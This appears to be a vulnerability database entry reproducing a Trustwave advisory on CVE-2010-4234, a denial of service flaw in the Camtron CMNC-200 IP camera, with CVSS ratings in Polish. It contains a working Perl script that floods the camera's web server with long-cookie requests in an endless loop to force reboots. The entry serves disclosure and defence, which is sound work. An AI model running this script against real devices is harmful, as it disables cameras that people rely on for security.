Camtron CMNC-200 IP Camera Denial of Service Vulnerability

2010.11.18
Risk: High
Local: No
Remote: Yes
CWE: CWE-399


Ogólna skala CVSS: 7.8/10
Znaczenie: 6.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Pełny

Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests with long cookie header makes the IP camera reboot a few seconds faster, however the same can be accomplished with requests of any size. The example code below is able to reboot the IP cameras in less than a minute in a local network. #!/usr/bin/perl use LWP::UserAgent; while (1 == 1){ $ua = new LWP::UserAgent; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6)"); $req = HTTP::Request->new(GET => 'http://192.168.10.100'); $req->header(Accept => "text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"); $req->header("Keep-Alive" => 0); $req->header(Connection => "close"); $req->header("If-Modified-Since" => "Mon, 12 Oct 2009 02:06:34 GMT"); $req->header(Cookie => "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); my $res = $ua->request($req); }

Referencje:

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
http://www.securityfocus.com/archive/1/archive/1/514753/100/0/threaded
http://www.exploit-db.com/exploits/15508


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top